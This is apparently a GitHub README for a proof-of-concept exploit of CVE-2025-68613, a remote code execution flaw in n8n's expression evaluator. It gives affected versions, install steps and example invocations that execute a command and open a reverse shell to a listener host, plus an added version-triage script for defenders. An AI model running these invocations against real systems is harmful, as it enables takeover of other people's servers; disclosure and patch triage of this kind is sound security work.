JohannesLks/CVE-2025-68613-Python-Exploit


CVE-2025-68613: n8n Workflow Expression RCE

Proof of Concept (PoC) exploit for a critical Remote Code Execution vulnerability in the n8n workflow automation platform.


Description

The vulnerability exists in the n8n expression evaluation system. User-supplied expressions are not properly sandboxed, allowing authenticated attackers to execute arbitrary code on the host system.

CVE ID: CVE-2025-68613
Vulnerability Type: Remote Code Execution (RCE)
Component: Expression Evaluator


Affected Versions

  • n8n >= 0.211.0
  • n8n < 1.120.4
  • n8n < 1.121.1
  • n8n < 1.122.0
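
For triaging your own deployments, the bounds listed above can be turned into a version check. This is an added example, not code from this repository; it assumes each "<" bound is the first fixed release on its own release line (1.120.x, 1.121.x, 1.122.x), and the inventory hostnames and versions are constructed.

```python
import re

# Lower bound copied from the "Affected Versions" list above.
FIRST_AFFECTED = (0, 211, 0)
# Assumption: each "<" bound in the list is the first fixed release
# on its own release line.
FIXED = [(1, 120, 4), (1, 121, 1), (1, 122, 0)]


def parse_version(text):
    """Return (major, minor, patch) from strings like 'v1.120.3' or '1.121.0'."""
    m = re.match(r"^v?(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised n8n version: {text!r}")
    return tuple(int(p) for p in m.groups())


def is_affected(text):
    """True if the version falls inside the affected range listed above."""
    v = parse_version(text)
    if v < FIRST_AFFECTED or v >= max(FIXED):
        return False
    # On a release line that has its own fix, compare against that fix.
    for fixed in FIXED:
        if v[:2] == fixed[:2]:
            return v < fixed
    # Older release lines: everything below the lowest fixed release is affected.
    return v < min(FIXED)


def triage(inventory):
    """Return the sorted names of instances that need upgrading."""
    return sorted(name for name, ver in inventory.items() if is_affected(ver))


# Constructed sample inventory (hostnames and versions are illustrative).
SAMPLE_INVENTORY = {
    "n8n-prod.example.internal": "1.120.3",
    "n8n-stage.example.internal": "1.121.1",
    "n8n-lab.example.internal": "v1.119.2",
    "n8n-legacy.example.internal": "0.210.2",
}

if __name__ == "__main__":
    for host in triage(SAMPLE_INVENTORY):
        print(f"upgrade required: {host} ({SAMPLE_INVENTORY[host]})")
```
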

Installation

git clone https://github.com/JohannesLks/CVE-2025-68613-Python-Exploit.git
cd CVE-2025-68613-Python-Exploit
pip install -r requirements.txt

Usage

Syntax

python3 n8n_exploit.py -t <TARGET> -u <USER> -p <PASSWORD> [OPTIONS]

Arguments

  • -t, --target : Target URL (e.g., http://localhost:5678)
  • -u, --username : n8n account email address
  • -p, --password : n8n account password
  • -c, --cmd : System command to execute
  • --reverse-shell : Trigger a reverse shell (Format: IP PORT)

Examples

Check vulnerability / Execute command:

python3 n8n_exploit.py -t http://target:5678 -u admin@example.com -p "P@ssword123" -c "id"

Establish Reverse Shell:

python3 n8n_exploit.py -t http://target:5678 -u admin@example.com -p "P@ssword123" --reverse-shell 192.168.1.100 4444

About

Python Exploit for CVE-2025-68613.
